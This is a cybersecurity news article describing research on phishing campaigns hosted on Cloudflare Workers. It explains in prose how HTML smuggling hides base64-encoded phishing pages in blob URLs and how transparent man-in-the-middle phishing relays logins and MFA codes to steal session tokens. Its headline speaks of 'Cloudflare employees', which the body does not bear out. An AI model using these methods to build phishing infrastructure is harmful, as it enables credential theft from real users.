Threat Actors Exploiting Cloudflare Employees for Sophisticated Phishing Attacks

Attackers are abusing Cloudflare Workers, a free serverless platform, to host phishing sites, which allows them to create multiple applications serving malicious content to a large audience using free subdomains and valid certificates. 

Researchers observed a rise in such activity in 2023, with the number of targeted users reaching a peak in Q4. While the number of targeted users seems to have stabilized in 2024, the number of distinct malicious applications (identified by unique subdomains) continues to grow steadily. 

Unique user traffic per quarter

Attackers are leveraging Cloudflare Workers to host phishing campaigns that utilize HTML smuggling to bypass network defenses, as the malicious payloads, in this case the phishing pages themselves, are hidden within seemingly harmless web pages. 

They achieve this by first encoding the phishing page in base64 and then employing multiple encoding layers for obfuscation. To make the hidden content accessible, they create a blob URL using the createObjectURL() method and then simulate a click on the URL using the click() method, essentially rendering the phishing page in the victim’s browser.  

the actual phishing page as a blob inside a benign web page

Adversaries are employing transparent phishing, a novel technique that bypasses the limitations of traditional phishing. 

In transparent phishing, attackers deploy a server acting as a Man-in-the-Middle (MitM) between the victim and the legitimate service, which relays the victim’s login credentials and multi-factor authentication codes to the real service, granting them access while covertly stealing this sensitive data. 

Unlike traditional phishing with imitated login pages, transparent phishing displays the legitimate login page, making detection through visual cues challenging, which effectively bypasses multi-factor authentication, posing a significant security threat.  

transparent phishing page showing the exact content of the legitimate login page

Researchers mimicked transparent phishing pages on Cloudflare to analyze their attack method, and by abusing a modified open-source MITM toolkit, attackers create a Cloudflare Worker that intercepts user requests. 

When a victim accesses the fake login page, the attacker’s script gathers the user’s request details (method, region, IP, and headers). With this information, the worker impersonates the victim and fetches the real login page from the legitimate site. 

The attacker then intercepts the legitimate response, replaces the real site’s domain with their own, and presents it to the victim, tricking them into unknowingly submitting credentials on a malicious page. 

Code Snippet

They are abusing Cloudflare Workers, a platform for running serverless functions, to host phishing websites and steal login credentials through a combination of techniques. 

One method involves tricking victims into logging in to a legitimate website through a fake login page hosted on a Cloudflare worker, where the attacker intercepts the communication between the victim and the real website, capturing login tokens and cookies. 

Another technique uses HTML smuggling to bypass security measures. Netskope Threat Labs is actively monitoring malicious traffic on Cloudflare Workers and reporting phishing attempts to Cloudflare for takedown. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here